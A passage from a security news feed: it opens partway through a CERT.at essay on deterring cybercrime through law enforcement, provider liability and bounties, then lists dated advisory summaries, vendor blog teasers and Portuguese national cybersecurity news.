as basic security awareness training. Hopefully, this is enough to stop being a target of opportunity, where script kiddies or mass exploitation campaigns can just waltz into your network. But there is a difference: the risk of getting caught simply for trying to hack into a network is very low. Thus, these actors can just keep on trying over and over again. Additionally, this can be automated and run on a global scale. In the real word, intrusion attempts do not scale at all. Every single case needs a criminal on site and that limits the number of tries per night and incurs a risk of being caught at each and every one of these. The result is that physical break-in attempts are rare, whereas cyber break-in attempts are so frequent that the industry has decided that "successful blocks on FW or mail-relay level per day" are no longer sensible metrics for a security solution. And just forget about reporting these to the police. Not all intrusion attempts are actually malicious (a good part of CERT.at’s data-feeds on vulnerabilities is based on such scans), the legal treatment of such acts are unclear (especially on an international level), and the sheer mass of it overwhelms all law enforcement capabilities. Additionally, these intrusion attempts usually are cross-border, necessitating an international police collaboration. The penalties for such activities (malicious scans, sending malspam, etc.) are also often too low to qualify for international efforts. In the physical world, the perpetrators must be present at the site of their victims. We’re not yet at the stage where thieves and burglars send remote controlled drones to break into houses and steal valuables there – unless you count the use of hired and expendable low-level criminals as such. There is thus no question about jurisdiction and the possibility of the local police to actually enforce the law. Collecting clues and evidence might not always be easy, and criminals fleeing the country before being caught is a common trope in crime literature, nevertheless there is the real possibility that the police can successfully track and then arrest the criminals. The global nature of the Internet changes all this. As the saying goes: there is no geography on the Internet, everyone is a direct neighbour to everybody else. Just as any simple website is open to visitors from all over the world, it can be targeted by criminals from all over the globe. There is no need for the evil hackers to be on the same continent as their targets, let alone in the same jurisdiction. Thus, even if the police can collect all the necessary evidence to identify the perpetrators, it cannot just grab them off the street – they might be far out of reach of the local law enforcement. And another point is different: usually, physical security measures are quite static. There is no monthly patch-day for your doors. I can’t recall any situation where a vendor of safes or locks had to issue an alert to all customers that they have to upgrade to new cylinders because a critical vulnerability was found in the current version (although watching LPL videos are a good argument that they should start doing that). Recent reports on vulnerabilities of keyless fobs for unlocking of cars show that the lines are starting to blur between these worlds. Organized crime What about serious, organized crime? The online equivalent to a mob boss is a "Ransomware as a Service (RaaS)" group: they provide the firepower, they create an efficient ecosystem of crime and they make it easier for low-level miscreants to start their criminal careers. Examples are Locky, REvil, DarkSide, LockBit, Cerber, etc. Yes, sometimes law-enforcement, through long-running, and international collaborations between law-enforcement agencies, is able to crack down on larger crime syndicates. Those take-downs vary in their effectiveness. In some cases, the police manages to get hold of the masterminds, but often enough they just get lower or mid-level people and some of the technical infrastructure, leading just to a temporary reprieve for the victims of the RaaS shop. Two major impediments to the effectiveness of these investigations are the global nature of such gangs and thus the need for truly global LE collaboration and the ready availability of compromised systems to abuse and malicious ISPs who don’t police their own customers. Any country whose police force is not cooperating effectively creates a safe refuge for the criminals. The current geo-political climate is not helpful at all. Right now, there simply is no incentive for the Russian law enforcement to help their western colleagues by arresting Russian gangs targeting EU or US entities. Bullet-proof hosters are similar, they rent the infrastructure to criminals from which to launch attacks from. And often enough the perpetrators simply use the infrastructure of one of their victims to attack the next. The end result is that serious cybercrime is rampant. Companies and other organisations must defend themselves against well-financed, experienced, and capable threat-actors. As it is, law enforcement is not capable to lower the threat level low enough to take that responsibility away from the operators. Nation states The next escalation step are the nation state attackers. They come in (at least) two types: Espionage and Disruption. Espionage is nothing new; the employment of spies traces back to antique world. But just as with cybercrime, in the new online world it is no longer necessary to send agents on dangerous missions into foreign countries. No, a modern spy has a 9 to 5 desk job in drab office building where the highest risk to his personal safety is a herniated vertebral disc caused by unergonomic desks and chairs. It’s been rare, but cyber-attacks with the aim of causing real world disruptions have appeared over the last ten years, especially in the Russia/Ukraine context. The impact can be similar to Ransomware: the IT systems are disabled and all the processes supported by those system will fail. The main difference is that you can’t simply buy your way out of a state-sponsored disruptive attack. There have been cases where the attackers try to inflict physical damage to either the IT systems (bricking of pcs in the Aramco attack) or machinery controlled by industrial control systems. This is a frustrating situation. We’re in a defensive mode, trying to block and thwart attack after attack from well resourced adversaries. As the recent history shows, we are not winning this fight – cybercrime is rampant and state-sponsored APTs are running amok. Even if one organisation manages to secure its own network, the tight interconnectedness with and dependency of others will leave it exposed to supply chain risks. What can we do about this? Such a situation reminds me of the old proverb: "if you can’t win the game, change the rules". I simply do not see a simple technical solution to the IT security challenge. We’ve been sold these often enough under various names (firewalls, NGFW, SIEMs, AV, EDR, SOAR, cloud-based detection, sandboxes to detected malicious e-mail, …) and while all these approaches have some value, they are fighting the symptoms, but not the cause of the problem. There certainly are no simple solutions, and certainly none without significant downsides. I’m thus not proposing that the following ideas need to be implemented tomorrow. This article is just supposed to move the Overton Window and start a discussion outside the usual constraints. So, what ideas can I come up with? Really invest in Law Enforcement The statistics show every year that cyber-crime is rising. This is followed by a ritual proclamation of the minister in charge that we will strengthen the police force tasked with prosecuting cyber-crime. The follow-through just isn't there. Neither the police, nor the judiciary is in any way staffed to really make a dent in cybercrime as a whole. They are fighting a defensive war, happy with every small victory they can get, but overall they are simply not staffed at a level where they really could make a difference. Denial of safe havens Criminals or other attackers need some infrastructure where they stage their attacks from. Why do we tolerate this? Possible avenues for a change are: Revisit the laws that shield ISPs from liabilities regarding misbehaving customers. This does not need to be a complete reversal, but there need to be clear and strong incentives not to allow customers to stage attacks from an ISP’s network. See below for more details. And on the other side, refuse to route the network blocks from ISPs who are known to tolerate criminals on their network. Back on Usenet, this was called the "UDP – Usenet Death Penalty": when you don’t police your own users’ misbehaviour on this global discussion forum, then other sites will decide not to accept any articles from your cesspool any more. The aim must be the end of "bulletproof" hosters. There have been prior successes in this area, but we can certainly do better on a global scale. Don’t spare abused systems Instead of renting infrastructure from bulletproof hosting outfits, the criminals often hack into an unrelated organisation and then abuse its systems to stage attacks from. Abused systems range from simple C2 proxies on compromised websites, DDoS-amplification, accounts for sending spam-mails to elaborate networks of proxies on compromised CPEs. These days, we politely warn the owners of the abused devices and ask them nicely to clean up their infrastructure. We treat them as victims, and not as accomplices. Maybe we need to adjust that approach. Mutual assured cyber destruction As bad as the cold war was, the concept of mutual assured destruction managed to deter the use of nuclear weapons for over 70 years. Right now, there is no functioning deterrence on the Internet. I can’t say what we need to do here, but we must create a significant barrier to the employment of cyberattacks. Right now, most offensive cyber activities are considered "trivial offences", maybe worth a few sternly worded statements, but nothing more. The EU Cyber Diplomacy Toolbox is a step in that direction, but is still rather harmless in its impact. We can and should do more. Broken Window Theory From Wikipedia: "In criminology, the broken windows theory states that visible signs of crime, antisocial behavior, and civil disorder create an urban environment that encourages further crime and disorder, including serious crimes." To put this bluntly: As we haven’t managed to solve the Spam E-mail problem, why do we think we can tackle the really serious crimes? Thus, one possible approach is to set aside some investigative resources in the law enforcement community to go after the low-level, but very visible criminals. Take for example the long running spam waves promoting ED pills. Tracking the spam source might be hard, but there is a clear money trail on the payment side. This should be an eminently solvable problem. Track those gangs down, make an example out of them and let every other criminal guess where the big LE guns will be pointing at next. As a side effect, the criminal infrastructure providers who support both the low level and the more serious cybercrime might also feel the heat. Offer substantial bounties We always say that ransomware payments are fuelling the scourge. They provide RaaS gangs with fresh capital to expand their operations and it is a great incentive for further activities in that direction. So, what about the following: decree by law that if you’re paying a ransom, then you have to pay 10% of the ransom into a bounty fund that incites operators in the ransomware gangs to turn in their accomplices. Placing bounties on the head of criminals is a very old idea and has proven to be effective to create distrust and betrayal in criminal organisations. Liability of Service Providers Criminals are routinely abusing the services offered by legitimate companies to further their misdeeds. Right now, the legal environment is shielding the companies whose services are abuse, from direct liability regarding the action of their customers. Yes, this liability is usually not absolute, often there is a "knowingly" or "repeatedly" or "right to respond to allegations" in the law that absolve the service providers to proactively search for or quickly react to reports of illegal activities originating from their customers. We certainly can have a second look at these provisions. Not all service providers should be treated the same way, a small ISP offering to host websites has vastly smaller resources to deal with abuse that the hyper-scalers with billions of Euros stock market valuations. The impact of abuse scales about the same way: a systematic problem at Google is much more relevant than anything a small regional ISP can cause. Spending the same few percentage points of their respective revenue on countering abuse can give the abuse handling teams of big operators the necessary punch to really be on top of abuse at their platform and do it 24x7 in real-time. We need to incentivise all actors to take care of the issue. Search Engine Liability By using SEO techniques or via simply buying relevant advertisement slots, criminals sometimes manage to lure people looking for legitimate free downloads to fake download sites that offer backdoored versions of the programs that the user is looking for. Given the fact that this is a very lucrative market for search engine operators, there should be no shortage on resources to deal with this abuse either proactively or in near real time when they are reported. And I really mean near real-time. Given e.g., Google’s search engine revenue, it is certainly possible to resolve routine complaints within 30 minutes, on a 24x7 coverage. If they are not able to do it, make them both liable for damages caused by their inaction and impose regulatory fines on them. For smaller companies, the response time requirements can be scaled down to levels that even a mom & pop ISP can handle. Content Delivery Network liability The same applies to content delivery networks: such CDNs are often abused to shield criminal activities. By hiding behind a CDN, it becomes harder to take down the content at the source, it becomes tricky to just firewall off the sewers of the Internet and even simple defensive measures like blocking JavaScript execution by domain are disrupted if the CDN serves scripts from their domains. Cloudflare boasts that a significant share of all websites is now served using their infrastructure. Still, they only commit to a 24h reaction time on abuse complaints for things like investment fraud. With great market-share comes great responsibility. We really need to forcibly re-adjust their priorities. It might be a feel-good move for libertarians to enable free speech, and sometimes controversial content really needs protection. But Cloudflare is acting like a polluter who doesn’t really care what damage their actions cause on others. Even in the libertarian heaven, good behaviour is triggered by internalizing costs by making liabilities explicit. Webhoster liability The same applies to the actual hosters of malicious content. In the western world, we need to give webhosters a size-dependent deadline for reacting to abuse-reports. For the countries who do not manage to create and enforce similar laws, the rest of the world need to react by limiting the reachability of non-conforming hosters. Keeping the IT market healthy Market monopolies are bad for security. They create a uniform global attack surface and distort the security incentives. This applies both to the software, the hardware/firmware side, the cloud as well as to the ISP ecosystem. What can the military do? In the physical word, the military is the ultimate deterrence against nation state transgressions. This is really hard to translate to cyber-security. I mentioned MAD above. This is really tricky: what is the proper way of retaliation? How do we avoid a dangerous escalation of hack, hack-back and hack-back-back? Or should we relish in the escalation? A colleague recently mentioned that some ransomware gang claimed to have hacked the US Federal Reserve and is threatening to publish terabytes of stolen data. I half joked by replying with "If I were them, I'd start to worry about a kinetic response by the US." There are precedents. Some countries are well known to react violently if someone decides to take one of their citizens as hostage. No negotiations. Only retribution with whatever painful means are available. Some cyber-attacks have a similar impact as violent terrorist attacks, just look at the ripple on effect on hospitals in London following the attack on Synnovis. So why should our response portfolio against ransomware actors rule out some the options we keep open for terrorists? Free and open vs. closed and secure Overall, there seem to be two major design decisions that have a major cyber security impact. First, the Internet is a content-neutral, global packet-switched network, for which there is only a very limited consensus regarding the rules that its operators and users should adhere to. And there are even fewer global enforcement possibilities for the little rules that we can agree on. On one hand, this is good. We do not want to live in a world where the standards for the Internet are set and enforced by oppressive regimes. The global reach of the Internet is also a net positive: it is good that there is a global communication network that interconnects all humans. Just as the phone network connects all countries, the global reach of the Internet has the potential to foster communication across borders and can bring humanity together. We want dissidents in Russia and China to be able to communicate with the outside world. On the other hand, this leads to the effects described in the first section: geography has no meaning on the Internet; thus, we’re importing the shadiest locations of the Internet right into our living rooms. We simply can’t have both: a global, content agnostic network that reaches everybody on the planet, and a global network where the behaviour that we find objectionable is consistently policed. The real decision is thus where to compromise: On "global", by e.g. declining to be reachable from the swamps of the Internet, or on "security": live with the dangers that arise from this global connectivity. The important part here is: this is a decision we need to take. Individually, as organisation and, perhaps, as a country. We face a similar dilemma with our computing infrastructure: The concept of the generic computer, the open operating systems, the freedom to install third-party programs and the availability of accessible programming frameworks plus a wealth of scripting languages are essential for the speed of innovation. A closed computing environment can never be as vibrant and successful. The ability to run arbitrary new code is both a boon for innovation, but also creates the danger of malicious code being injected into our system. Retrofitting more control here (application allowlisting, signed applications, strong application isolation, walled garden app-stores, …) can mitigate some of the issues, but will never reach the security properties of system that was designed to run exactly one application and doesn’t even contain the foundations for running additional code. Again, there is a choice we need to make: do we prefer open systems with all their dangers, or do we try to nail things down to lower the risks? This does not need to be a global choice: we should probably choose the proper flexibility vs. security setting depending on intended use of an IT system. A developer’s box needs not have the same setting as a tablet for a nursing home resident. Technical solutions – just don’t be easily hackable? In an ideal world, our IT systems would be perfectly secure and would not be easy pray for cyber-criminals and nation state actors. Yes, any progress in securing our infrastructure is welcome, but we cannot simply rely on this path. Nevertheless, there are a few low hanging fruits we need to take: Default configurations: Networked devices need to come with defaults that are reasonably secure. Don’t expect users to go through all configuration settings to secure a product that they bought. This can be handled via regulation. Product liability is also an interesting approach. This is not trivial to get right, but certain classes of security issues are so basic that failing to protect against them amounts to gross negligence in 2024. For example, we recently saw several path traversal vulnerabilities in edge-devices sold in 2024 by security companies with more than a billion-dollar market cap. Sorry, such bugs should not happen in this league. The Cyber Resilience Act is an attempt to address these issues. I have no clue whether it will actually work out well. While I hope that we will manage to better design and operate our critical IT infrastructure in the future, this is not the part where I’d put my money on. We’ve been chasing that goal for the last 25 years and it hasn’t been working out so great. We really need to start thinking outside the box.

https://www.cert.at/en/blog/2024/7/csirt-le-military
Quantum is unimportant to post-quantum
2024-07-01T13:00:01Z | 1719838801

You might be hearing a lot about post-quantum (PQ) cryptography lately, and it’s easy to wonder why it’s such a big deal when nobody has actually seen a quantum computer. But even if a quantum computer is never built, new PQ standards are safer, more resilient, and more flexible than their classical […]

https://blog.trailofbits.com/2024/07/01/quantum-is-unimportant-to-post-quantum/
Vulnerability in SOWA OPAC software
2024-07-01T13:00:00Z | 1719838800

Reflected XSS vulnerability (CVE-2024-6050) has been found in SOWA OPAC software.

https://cert.pl/en/posts/2024/07/CVE-2024-6050/
Social Media Monitoring and Rogue App Detection in Akamai Brand Protector
2024-07-01T13:00:00Z | 1719838800

https://www.akamai.com/blog/security/2024/jul/social-media-monitoring-and-rogue-app-detection
CVE-2024-39348
2024-07-01T10:57:00Z | 1719831420

Download of code without integrity check vulnerability in AirPrint functionality in Synology Router Manager (SRM) before 1.2.5-8227-11 and 1.3.1-9346-8 allows man-in-the-middle attackers to execute arbitrary code via unspecified vectors. The vulnerability allows man-in-the-middle attackers to execute arbitrary code or access intranet resources via a susceptible version of Synology Router Manager (SRM).

https://claroty.com/team82/disclosure-dashboard/cve-2024-39348
Cato Survey: Remote Access Issues and Need for Increased Visibility Continue to Drive SASE in 2024
2024-07-01T09:47:56Z | 1719827276

2024 is expected to be another year of strong growth in the SASE market. Dell’Oro Group predicts the SASE market will surpass $10 billion by the end of the year “representing more than a doubling of the total market in three years,” according to Mauricio Sanchez, Senior Research Director of Dell’Oro Group. Gartner expects the... The post Cato Survey: Remote Access Issues and Need for Increased Visibility Continue to Drive SASE in 2024 appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-survey-remote-access-issues-and-need-for-increased-visibility-continue-to-drive-sase-in-2024/
Cato Managed SASE: Enabling Partners to Deliver Advanced Services
2024-06-30T10:48:53Z | 1719744533

The post Cato Managed SASE: Enabling Partners to Deliver Advanced Services appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-managed-sase-enabling-partners-to-deliver-advanced-services/
Vulnerabilities in Concept Intermedia S@M CMS software
2024-06-28T13:00:00Z | 1719579600

During its own research, CERT Polska has found 3 vulnerabilities (CVE-2024-3800, CVE-2024-3801 and CVE-2024-3816) in Concept Intermedia S@M CMS software.

https://cert.pl/en/posts/2024/06/CVE-2024-3800/
How TrafficPeak Helped Provide a Superior Football Viewing Experience
2024-06-28T13:00:00Z | 1719579600

https://www.akamai.com/blog/cloud/2024/jun/trafficpeak-helped-provide-superior-football-viewing-experience
Vulnerabilities in AdmirorFrames Joomla! extension
2024-06-28T11:00:00Z | 1719572400

CERT Polska has received a report about 3 vulnerabilities (CVE-2024-5735, CVE-2024-5736 and CVE-2024-5737) found in AdmirorFrames Joomla! extension.

https://cert.pl/en/posts/2024/06/CVE-2024-5735/
From Fukuoka to Copenhagen: LAC’s Insights on the Latest Cyber Threat Trends
2024-06-28T10:30:00Z | 1719570600

The 36th annual FIRST Conference, "FIRSTCON24," was held from June 9 to 14, 2024, in Fukuoka, Japan. This marked the first time in 15 years that the conference was hosted in Japan, with the last event taking place in Kyoto in 2009. The conference saw a remarkable turnout with 997 participants from 99 countries and regions.

https://www.first.org/blog/20240628-from-fukuoka-to-copenhagen
From Fukuoka to Copenhagen: LAC’s Insights on the Latest Cyber Threat Trends
2024-06-28T10:30:00Z | 1719570600

The 36th annual FIRST Conference, "FIRSTCON24," was held from June 9 to 14, 2024, in Fukuoka, Japan. This marked the first time in 15 years that the conference was hosted in Japan, with the last event taking place in Kyoto in 2009. The conference saw a remarkable turnout with 997 participants from 99 countries and regions.

https://www.first.org/blog/20240628-from-fukuoka-to-copenhagen
Security Alert (A24-06-14): Multiple Vulnerabilities in Microsoft Edge
2024-06-28T04:00:00Z | 1719547200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-06-15): Multiple Vulnerabilities in VMware Products
2024-06-28T04:00:00Z | 1719547200

VMware has published security advisories to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Procedimento Concursal para desenvolvimento de conteúdo gamificado e interativo
2024-06-28T00:00:00Z | 1719532800

Está disponível na plataforma electrónica de Contratação Pública AcinGov para os eventuais interessados, o Concurso de conceção simplificado, que visa o desenvolvimento de conteúdo gamificado e interativo, com base nos recursos Zigzaga na Net, a ser implementado na Plataforma CIS Lab: Caderno de encargos Termos de Referência

https://dyn.cncs.gov.pt/pt/detalhe/art/135871/procedimento-concursal-para-desenvolvimento-de-conteudo-gamificado-e-interativo
10 anos de C-Days, 10 anos de CNCS, 10 anos a desenvolver a cibersegurança em Portugal!
2024-06-28T00:00:00Z | 1719532800

Nos dias 18, 19 e 20 de junho, o Convento de São Francisco, em Coimbra foi palco da 10.ª edição da C-Days, a conferência anual do Centro Nacional de Cibersegurança (CNCS), dedicada ao tema +Prevenção. No ano em que o CNCS também celebra 10 anos de existência, falou-se do que ainda tem para dar e construir, do presente e do futuro. O programa desta edição contou com 14 keynotes, 23 painéis de debate, 10 workshops, sete apresentações no âmbito da call for presentations e três Oficinas Temáticas Internet Segura para crianças e jovens. Durante três dias oradores, nacionais e internacionais, de diferentes áreas do conhecimento e setores da sociedade contribuíram para um espaço de discussão e reflexão das grandes temáticas associadas à segurança do ciberespaço, numa perspetiva, simultaneamente, estratégica, operacional e técnica. A conferência incluiu um espaço para start ups, no qual foi possível realizar speed meetings com potenciais clientes, parceiros e investidores. Reforçando o mote da C-Days 2024 “+Prevenção”, na sessão de abertura oficial, o coordenador do CNCS, Lino Santos referiu-se à cibersegurança como “uma missão sem fim, interrupções ou descansos”, considerando a evolução do quadro de ameaças e a necessidade de constante adaptação e de respostas eficazes às vulnerabilidades trazidas pelas novas tecnologias. A maior conferência de cibersegurança do país, que juntou a comunidade de cibersegurança, fortaleceu uma mensagem realçada pelo Diretor-geral do Gabinete Nacional de Segurança, Contra-almirante António Gameiro Marques – “preparar a sociedade para responder aos atuais desafios, que passam, também, pela partilha de saberes e experiências e solidez da rede de ligações, que devem ser perseguidas com perseverança e determinação, numa postura de cooperação proativa, em rede com as pessoas e com lideranças comprometidas”. Paralelamente à C-Days 2024, e nas mesmas instalações, decorreu o Exercício Nacional de Cibersegurança inserido no Cyber Europe 24, dedicado ao setor da Energia, que para António Gameiro Marques, “densifica ainda mais esta importante comunidade e contribui para a tal capacitação coletiva a que nos temos vindo a referir”. A 10.ª edição da conferência contou com o apoio do NCC-PT e a nível institucional, da Universidade do Porto, Câmara Municipal de Coimbra, Ordem dos Engenheiros da Região Centro, Universidade de Coimbra e Coimbra Business School, bem como o apoio de mais de uma dezena de parceiros estratégicos dos setores público e privado e dos Media Partners - Renascença, Security Magazine, Valor e Pplware. As anteriores edições da C-Days  têm contribuído para a afirmação e solidificação das comunidades de cibersegurança e da sua relação com a sociedade e o tecido económico, sendo atualmente reconhecida pela abrangência dos temas que aborda e pela qualidade dos seus oradores, traduzindo-se na presença de participantes com origem em diversos setores e organizações e instituições, públicas e privadas, incluindo profissionais de IT, gestores, académicos e comunidade estudantil. Este reconhecimento levou, a partir de 2022, ao surgimento de edições anuais da C-DAYS, em parceria com os Governos Regionais dos Açores e da Madeira.  

https://dyn.cncs.gov.pt/pt/detalhe/art/135872/10-anos-de-c-days-10-anos-de-cncs-10-anos-a-desenvolver-a-ciberseguranca-em-portugal
Concurso para Projetos de IC&DT – IA, Ciência dos Dados e Cibersegurança de relevância na AP
2024-06-28T00:00:00Z | 1719532800

Estão abertas, até 31 de julho, as candidaturas para o Concurso para Projetos de IC&DT – Inteligência Artificial, Ciência dos Dados e Cibersegurança de relevância na Administração Pública, no âmbito do Investimento do PRR – C05-i08 – Ciência Mais Digital. O concurso visa apoiar projetos de investigação científica e desenvolvimento tecnológico, em todas as fases, desde atividades exploratórias até provas de conceito, nos seguintes eixos temáticos: Inteligência artificial e ciência de dados, incluindo (entre outras): análise de grandes volumes de dados; análise preditiva, processamento de língua natural, análise de padrões, aprendizagem automática; Desenho de serviços digitais e design de interação, numa perspetiva interdisciplinar e centrada no cidadão; Cibersegurança, incluindo (entre outras): prevenção, deteção, análise e a capacidade de aprender e de responder a ameaças, riscos e incidentes que coloquem em causa a proteção de infraestruturas, dos dados e das pessoas; Governança de Inteligência Artificial: atividades de investigação e de estudo/planeamento, incluindo aspetos legais, com vista ao estabelecimento de uma futura estrutura ou organização nacional dedicada à implementação de tecnologias de inteligência artificial à luz do “AI Act”. Podem candidatar-se ao financiamento as equipas de investigação das seguintes entidades beneficiárias: Instituições do ensino superior, seus institutos e unidades de I&D; Laboratórios do Estado, Laboratórios Associados ou internacionais com sede em Portugal; Instituições privadas sem fins lucrativos que tenham como objeto principal atividades de I&D, incluindo Laboratórios Colaborativos (CoLab) e Centros de Tecnologia e Inovação (CTI); Outras instituições públicas e privadas, sem fins lucrativos, que desenvolvam ou participem em atividades de investigação científica. E ainda: Empresas de qualquer natureza e sob qualquer forma jurídica, desde que inseridas em projetos de IC&DT liderados por entidades não empresariais do sistema de I&I. Os projetos devem assumir a modalidade de “projetos individuais”, apresentados por um único beneficiário final, ou de “projetos em copromoção”, apresentados por dois ou mais beneficiários finais, com uma duração máxima de 12 meses. Este concurso tem uma dotação orçamental de 8.375.000€ e os projetos vão ter uma duração máxima de 12 meses, sendo elegíveis despesas incorridas pelos beneficiários finais, entre 1 de janeiro de 2023 e 31 de outubro de 2025, com um financiamento máximo, por projeto, de 125.000,00€. As candidaturas, que iniciaram no dia 24 de junho, devem ser apresentadas, em língua inglesa, até às 17 horas, hora de Lisboa, do dia 31 de julho de 2024, em formulário eletrónico específico e submetidas através da plataforma myFCT. Mais informações

https://dyn.cncs.gov.pt/pt/detalhe/art/135870/concurso-para-projetos-de-icdt-ia-ciencia-dos-dados-e-ciberseguranca-de-relevancia-na-ap
International Cyber Defence Surge: CERT.LV leads a Month-Long Operation in collaboration with Allied Forces
2024-06-27T13:32:02Z | 1719495122

CERT.LV has just concluded a month-long surge in collaboration with the Canadian Armed Forces (CAF), Canadian Centre for Cyber Security (CCCS), and the Latvian National Armed Forces (LNAF) to augment and further strengthen the ongoing threat hunt operations aimed at defending the networks, systems and digital services of significant importance to Latvia.

https://cert.lv/en/2024/06/international-cyber-defence-surge-cert-lv-leads-a-month-long-operation-in-collaboration-with-allied-forces
Celebrating a Year of Innovation with Akamai Brand Protector
2024-06-27T13:00:00Z | 1719493200

https://www.akamai.com/blog/security/2024/jun/year-of-innovation-with-akamai-brand-protector
Radiflow, Garland align to enhance real-time anomaly detection in OT environments
2024-06-27T07:20:52Z | 1719472852

The post Radiflow, Garland align to enhance real-time anomaly detection in OT environments appeared first on Radiflow.

https://industrialcyber.co/news/radiflow-garland-align-to-enhance-real-time-anomaly-detection-in-ot-environments/
Exercício Nacional de Cibersegurança e Cyber Europe dedicado ao Setor da Energia
2024-06-27T00:00:00Z | 1719446400

Decorreu, nos dias 19 e 20 de junho, a quinta edição do Exercício Nacional de Cibersegurança (ExNCS’24), organizado pelo Centro Nacional de Cibersegurança, inserido na sétima edição do CyberEurope, um dos maiores exercícios de cibersegurança na Europa, iniciativa bienal da ENISA, que testou a resiliência do setor energético europeu, a vários níveis: técnico, operacional e estratégico e visou contribuir para a existência de uma voz comum de toda a Europa, na resposta a um cenário idêntico em todos os países. O ExNCS’24 e o CyberEurope'24 foram dedicados ao Setor da Energia, com um cenário centrado em ameaças de cibersegurança dirigidas à infra-estrutura energética da UE, decorrentes de atritos causados ​​pela tensão geopolítica entre a União Europeia e uma nação estrangeira fictícia. Com a propaganda a influenciar a opinião pública e as preocupações sobre grupos APT (Advanced Persistent Threat) que exploram vulnerabilidades, o setor da energia tornou-se o alvo principal. Para evitar que um ataque em grande escala paralisasse a economia europeia e desestabilizasse o equilíbrio político, as partes interessadas tiveram de coordenar rapidamente as suas ações e respostas.  A ação de dois dias simulou uma série de incidentes de cibersegurança em grande escala. Trabalhando em conjunto, os intervenientes aprimoraram as suas competências de coordenação e gestão de crises para enfrentar os desafios colocados pelos cenários avançados, garantindo a continuidade dos negócios face a uma crise. O Cyber Europe reuniu 30 Agências Nacionais de Cibersegurança, várias agências europeias, organismos e redes da UE e mais de 1 000 peritos que lidam com diversas áreas, desde a resposta a incidentes até à tomada de decisões. Foi um dos maiores exercícios de cibersegurança organizados na Europa.   Grandes números do Cyber Europe: 29 países;      28 100 injects; Mais de 1 000 jogadores, Em Portugal, o ExNCS’24 reuniu em Coimbra, entidades do setor energético, operadores de comunicações eletrónicas, reguladores, outras entidades e órgãos de comunicação social, que lidaram com incidentes simulados, com forte plausibilidade, nomeadamente, ataques de ransomware com efeito disruptivo nas cadeias de fornecimento de energia elétrica de gás e ataques físicos com possíveis consequências na componente digital de divulgação de dados privados de organizações. Foram colocadas à prova as capacidades individuais das organizações, mas também as capacidades de articulação, quer com autoridades, quer com outras entidades a nível europeu.   Grandes números do ExNCS’24: 22 entidades nacionais; 56 participantes em sala, e muitos outros nas respetivas organizações; 1 320 comunicações submetidas em respostas aos injects. O cenário de crise energética definido pelo ExNCS’24 e pelo CyberEurope'24 testou os procedimentos que devem ser seguidos pelos participantes, nomeadamente do ponto de vista técnico, da comunicação interna e externa, sendo avaliados alguns dos instrumentos criados pela atual Diretiva NIS, e outros que surgem no âmbito da NIS 2, como por exemplo a EU CyCLONe - Rede de gestão de crises ao nível da União Europeia. O Comissário da UE para o Mercado Interno, Thierry Breton, na visita às instalações da ENISA e da sala onde decorreu o Cyber ​​Europe, afirmou que “a cibersegurança é uma prioridade comum. Só em 2023, mais de 200 incidentes comunicados visaram o setor energético, e mais de metade destes foram dirigidos, especificamente, contra a Europa. As ameaças à cibersegurança em setores críticos podem ter impacto na vida quotidiana dos cidadãos, mas também nas empresas e nos serviços públicos em toda a UE. Este tipo de exercício é essencial para testar a nossa resiliência em matéria de cibersegurança com os principais parceiros, se quisermos proteger os cidadãos da UE.” Já o Diretor Executivo da Agência da UE para a Cibersegurança, Juhan Lepassaar, declarou que “a preservação das nossas infraestruturas críticas é um dos alicerces do mercado único e, portanto, temos de melhorar as nossas capacidades de preparação e resposta para protegê-las. O Cyber Europe é a prova de que estamos empenhados nos nossos esforços para alcançar esse objetivo”. O relatório “Network and Information Security (NIS) Investments in the EU” emitido pela ENISA, concluiu que 32% dos operadores do setor da energia não têm um único processo crítico de Tecnologia Operacional (OT) monitorizado por um Centro de Operações de Segurança (SOC). A Tecnologia Operacional e a Tecnologia da Informação são cobertas por um único SOC para 52% dos operadores de serviços essenciais do setor energético. Após o CyberEurope'24, vai ser realizada uma análise dos processos e resultados para obtenção de conhecimentos sobre as fragilidades identificadas. As conclusões vão ser incluídas no relatório pós-ação, que visa fornecer orientações e sugestões para melhorias adicionais, tanto para o exercício em si, como também para reforçar a resiliência do sector energético da UE.

https://dyn.cncs.gov.pt/pt/detalhe/art/135869/exercicio-nacional-de-ciberseguranca-e-cyber-europe-dedicado-ao-setor-da-energia
Top Questions Security Teams Ask about Copilot for M365 by Vectra AI Product Team
2024-06-27T00:00:00Z | 1719446400

Copilot for Microsoft 365 promises enterprises new opportunities backed by AI efficiency, but are attackers also benefiting from this new functionality?

https://www.vectra.ai/blog/top-questions-security-teams-ask-about-copilot-for-m365-and-how-to-stop-copilot-based-attacks-dead-in-their-tracks
Perma-Vuln: D-Link DIR-859, CVE-2024-0769
2024-06-27T00:00:00Z | 1719446400

We've uncovered a path traversal vulnerability in the D-Link DIR-859 router that leads to information disclosure. This exploit allows extraction of account details and poses long-term risks since the product is End-of-Life and won't be patched.

https://www.greynoise.io/blog/perma-vuln-d-link-dir-859-cve-2024-0769
Keep Your Tech Flame Alive: Trailblazer Mie Elmkvist Schneider
2024-06-26T13:00:00Z | 1719406800

In this Akamai FLAME Trailblazer blog post, Mie Elmkvist Schneider from Queue-it describes the differences between being a manager and being a leader.

https://www.akamai.com/blog/culture/2024/jun/keep-your-tech-flame-alive-trailblazer-mie-elmkvist-schneider
Companies Optimize Cloud Costs and Deliver Superior Experiences on Akamai
2024-06-26T13:00:00Z | 1719406800

Learn how Akamai?s customers optimize their cloud computing costs and deliver engaging customer experiences with our open and affordable cloud infrastructure.

https://www.akamai.com/blog/cloud/2024/jun/companies-optimize-cloud-costs-deliver-superior-experiences-on-akamai
Progress Software Corporation WhatsUp Gold TestController Chart denial of service vulnerability
2024-06-26T00:00:00Z | 1719360000

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1934
Progress Software Corporation WhatsUp Gold AppProfileImport path traversal vulnerability
2024-06-26T00:00:00Z | 1719360000

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1932
Progress Software Corporation WhatsUp Gold TestController multiple information disclosure vulnerabilities
2024-06-26T00:00:00Z | 1719360000

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1933
What?s That Scraping Sound? How Web Scraper Bots Erode Ecommerce Profits
2024-06-25T14:00:00Z | 1719324000

https://www.akamai.com/blog/security-research/2024/jun/2024-commerce-soti-web-scraper-bots
